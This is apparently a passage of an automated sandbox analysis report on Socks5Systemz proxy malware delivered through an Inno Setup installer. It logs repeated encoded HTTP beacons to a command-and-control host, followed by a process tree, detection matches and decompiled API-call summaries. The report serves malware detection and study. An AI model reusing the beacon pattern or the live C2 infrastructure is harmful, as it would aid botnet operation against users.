Sep 27, 2024 17:33:00.771852970 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:33:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	57584	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:33:00.913867950 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:33:01.633050919 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:33:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	57585	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:33:01.747680902 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:33:02.490453959 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:33:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	57586	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:33:02.629847050 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:33:03.387306929 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:33:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	57587	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:33:03.518883944 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:33:04.246556997 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:33:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Target ID:	0
Start time:	11:30:57
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	3'298'104 bytes
MD5 hash:	5F3D49BFFED0DA5D969582BD92FED715
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	11:30:57
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp" /SL5="$20434,3031792,56832,C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	708'608 bytes
MD5 hash:	499BD324F6DD0DF600B61BE36E26B612
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	11:30:58
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe" -i
Imagebase:	0x400000
File size:	3'264'512 bytes
MD5 hash:	D9BDC42F41BCE78D0C9D0FB3AC33D0DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3371905613.0000000002721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	1520
Total number of Limit Nodes:	22

Executed Functions

Function 00409B78 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 00409B8A
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669

Function 0040520C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6

Strings

SetSearchPathMode, xrefs: 0040459F
SetDllDirectoryW, xrefs: 00404589
SetProcessDEPPolicy, xrefs: 004045B5
kernel32.dll, xrefs: 0040457D

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcess
String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
API String ID: 3256987805-3653653586
Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

Function 0040AAB4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32 ref: 0040AAC1

Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D1D6C), ref: 0040966C

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
SetWindowLongA.USER32(00020434,000000FC,00409960), ref: 0040AB15
RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
DestroyWindow.USER32(00020434,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15

Strings

InnoSetupLdrWindow, xrefs: 0040AAF2
/SL5="$%x,%d,%d,, xrefs: 0040AB55
STATIC, xrefs: 0040AAF7

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3757039580-3001827809
Opcode ID: 512ba3d6f2e9f1c3867d88fe9cc8f5790ae5845b184f1ae6f41adfa2939ac233
Instruction ID: be79b44adbed8f80b53e5612ba2c07cab25871a7655baedeeb07d74425ea1546
Opcode Fuzzy Hash: 512ba3d6f2e9f1c3867d88fe9cc8f5790ae5845b184f1ae6f41adfa2939ac233
Instruction Fuzzy Hash: 83410070604204DBDB10EBA9EE89B9D37A5EB49304F10467FF114B72E2D7B89845CB9D

Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4

Strings

kernel32.dll, xrefs: 004090BF, 004090D9
shell32.dll, xrefs: 00409110
Wow64DisableWow64FsRedirection, xrefs: 004090BA
Wow64RevertWow64FsRedirection, xrefs: 004090D4

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

Function 0040AAA2 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
SetWindowLongA.USER32(00020434,000000FC,00409960), ref: 0040AB15

Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94

Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8,00000000,00409ABF), ref: 00409A5C
Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8,00000000), ref: 00409A70
Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8), ref: 00409AA4

RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
DestroyWindow.USER32(00020434,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15

Strings

InnoSetupLdrWindow, xrefs: 0040AAF2
/SL5="$%x,%d,%d,, xrefs: 0040AB55
STATIC, xrefs: 0040AAF7

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3586484885-3001827809
Opcode ID: abbbb59459200108d21b408613378a390e3e047840070f8330146cd7c6fc736f
Instruction ID: 3ba592a6bb5a586105fd12ff7794ab8e81bfb13978b6693ff680cbbbd79f3ebd
Opcode Fuzzy Hash: abbbb59459200108d21b408613378a390e3e047840070f8330146cd7c6fc736f
Instruction Fuzzy Hash: EF410B71604204DFD714EBA9EE89B5A37B5EB48314F20467BF104BB2E1D7B8A844CB9D

Function 004099EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8,00000000,00409ABF), ref: 00409A5C
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8,00000000), ref: 00409A70
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D1D6C,00409AD8), ref: 00409AA4

Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D1D6C), ref: 0040966C

Strings

D, xrefs: 00409A36

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

Function 00401918 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Strings

4Rt, xrefs: 00401950
DRt, xrefs: 00401946

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: 4Rt$DRt
API String ID: 730355536-192030282
Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

Function 0040A814 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878

Strings

.tmp, xrefs: 0040A8BE
y@, xrefs: 0040A981

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message
String ID: .tmp$y@
API String ID: 2030045667-2396523267
Opcode ID: d4ac7463dbf5d161e361ca9bc326db0ca40d9a64499bf0d63171a4d21a2c3052
Instruction ID: b6b31011a0dd284aafbaa2c2e49cce084e53b2f1e69b481334740b61ed9710c2
Opcode Fuzzy Hash: d4ac7463dbf5d161e361ca9bc326db0ca40d9a64499bf0d63171a4d21a2c3052
Instruction Fuzzy Hash: DA41A171704200DFD715EF65EED1A1A77A5E749304B61853AF804B73E1C679AC10CBAD

Function 0040A82F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878

Strings

.tmp, xrefs: 0040A8BE
y@, xrefs: 0040A981

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message
String ID: .tmp$y@
API String ID: 2030045667-2396523267
Opcode ID: 0c9aecb76b7a3e7a11760fd8a915a701fd69e196c0d41de26bbb48f3063f32c7
Instruction ID: ebe7ed5bd99e4afc73068d402fc5cc7c846ae42ea211bad011db29787866ec42
Opcode Fuzzy Hash: 0c9aecb76b7a3e7a11760fd8a915a701fd69e196c0d41de26bbb48f3063f32c7
Instruction Fuzzy Hash: 4B41A070700200DFC711EF65DED6A5A77A5EB49304B61463AF804B73E2CAB9AC10CBAD

Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F

Strings

.tmp, xrefs: 0040935F

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

Function 00401430 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Strings

DRt, xrefs: 0040146E

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: DRt
API String ID: 2087232378-1463252733
Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF

Memory Dump Source

Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
